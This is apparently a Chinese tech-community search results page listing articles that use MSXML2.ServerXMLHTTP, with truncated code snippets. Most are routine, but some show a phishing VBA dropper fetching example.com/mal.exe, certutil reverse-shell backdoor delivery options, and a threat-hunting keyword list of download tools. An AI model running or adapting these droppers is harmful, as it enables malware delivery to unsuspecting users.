首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏Eureka的技术时光轴

    使用WinHttpRequest伪造referer

    winhttprequest入门教程,winhttprequest高级使用教程 从msdn得知,WinHttp.WinHttpRequest.5.1 是 msxml 4.0 的底层对象,也就是说 XMLHTTP/ServerXMLHTTP 原本以为给 XMLHTTP 对象增加一个 Referer 的header 就可以,结果却没有任何作用,改用 ServerXMLHTTP 也如此。

    3.2K10发布于 2020-05-25
  • 来自专栏鸿鹄实验室

    钓鱼常用的vba代码

    //example.com/mal.exe" localPath = "c://asd.exe" Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP https://example.com/mal.dll" Dim WinHttpReq As Object Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP PowerShdll.dll" #End If Dim WinHttpReq As Object Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP

    1.2K40发布于 2021-04-15
  • 来自专栏c++ 学习分享

    2021-05-25

    Set http = CreateObject("Msxml2.ServerXMLHTTP.4.0") 然后注意看包头: /member.php? cookietime=2592000&password=" & password & "&quickforward=yes&handlekey=ls" Set http = CreateObject("Msxml2.ServerXMLHTTP cookietime=2592000&password=" & password & "&quickforward=yes&handlekey=ls" Set http = CreateObject("Msxml2.ServerXMLHTTP

    49720编辑于 2023-07-06
  • 来自专栏编程

    三种主流Web架构

    : Private Function httpGet(url, method, data) Dim xmlhttp Set xmlhttp = Server.CreateObject("MSXML2.ServerXMLHTTP Private Function httpPost(url, method, data) Dim xmlhttp Set xmlhttp = Server.CreateObject("MSXML2.ServerXMLHTTP Function Private Function httpPut(url, method, data) Dim xmlhttp Set xmlhttp = Server.CreateObject("MSXML2.ServerXMLHTTP Private Function httpDelete(url, method, data) Dim xmlhttp Set xmlhttp = Server.CreateObject("MSXML2.ServerXMLHTTP

    5.6K71发布于 2018-02-02
  • 来自专栏潇湘信安

    命令执行/SQL盲注无回显外带方式

    [CDATA[ Sub getName(name) Dim http Set http = CreateObject("Msxml2.ServerXMLHTTP") http.open [CDATA[ Sub getName(name) Dim http Set http = CreateObject("Msxml2.ServerXMLHTTP") http.open

    2.9K10编辑于 2022-09-14
  • 来自专栏IT开发技术与工作效率

    VBA登录抓取网络数据

    Set http = CreateObject("Msxml2.ServerXMLHTTP") http.Open "post", "登录网址", False http.setRequestHeader

    3.9K40发布于 2018-06-20
  • 来自专栏农夫安全

    渗透技巧——从github下载文件的多种方法

    ado.Write http.responseBody ado.SaveToFile "c:\download\a.exe" ado.Close 但该脚本不支持https下载,可以换用Msxml2.ServerXMLHTTP Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 Dim http,ado Set http = CreateObject("Msxml2.ServerXMLHTTP

    4.2K20发布于 2019-07-31
  • 来自专栏全栈程序员必看

    WinHttp用法(WinHttp.WinHttpRequest.5.1方法,属性)

    从msdn得知,WinHttp.WinHttpRequest.5.1是msxml4.0的底层对象,也就是说XMLHTTP/ServerXMLHTTP也是在它的基础上封装而来,WinHttpRequest

    3.9K10编辑于 2022-09-15
  • 来自专栏全栈工程师修炼之路

    SQL注入原理分析与绕过案例.md

    Function PostData(PostUrl,PostStr,PostCok,PostRef) Dim Http Set Http = Server.CreateObject("msxml2.serverXMLHTTP

    72030编辑于 2022-09-28
  • 来自专栏FreeBuf

    浅谈威胁狩猎(Threat Hunting)

    downloadstring wget curl WebRequestWinHttpRequest iwr irm “internetExplorer.Application”“Msxml2.XMLHTTP”“MsXml2.ServerXmlHttp

    3.5K20发布于 2019-11-28
  • 来自专栏全栈工程师修炼之路

    SQL注入原理分析与绕过案例.md

    Function PostData(PostUrl,PostStr,PostCok,PostRef) Dim Http Set Http = Server.CreateObject("msxml2.serverXMLHTTP

    1.4K10发布于 2020-10-23
  • 来自专栏全栈程序员必看

    网站被挂马实用怎么解决的办法之一[通俗易懂]

    Application_OnEnd end sub Public Function GetHtml(url) Set ObjXMLHTTP=Server.CreateObject(“MSXML2.serverXMLHTTP

    2.2K20编辑于 2022-09-27
  • 来自专栏IT开发技术与工作效率

    VBA下载

    Select '为了兼容按钮放到其他表中 ri = 5 ' 联网提示 ("http://ssa.jd.com/sso/login") Set http = CreateObject("Msxml2.ServerXMLHTTP

    2.8K40发布于 2018-06-20
  • certutil 命令配合PS反弹后门

    PSCOMIE PS COM object + Iexplore.exe [*] MEMORY\PSCOMMSXML PS COM object + MsXml2.ServerXmlHttp

    1.2K30编辑于 2022-12-28
  • 来自专栏HACK学习

    干货 | Certutil在渗透中的利用和详解

    PSCOMIE PS COM object + Iexplore.exe[*] MEMORY\PSCOMMSXML PS COM object + MsXml2.ServerXmlHttp

    7.1K61发布于 2021-07-21
  • 来自专栏红队蓝军

    干货 | Certutil在渗透中的利用和详解

    PSCOMIE PS COM object + Iexplore.exe[*] MEMORY\PSCOMMSXML PS COM object + MsXml2.ServerXmlHttp

    2.8K21编辑于 2022-05-17
  • 来自专栏渗透云笔记

    渗透测试常规操作记录(下)

    Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 Dim http,ado Set http = CreateObject("Msxml2.serverXMLHTTP

    6.3K50发布于 2020-10-23
领券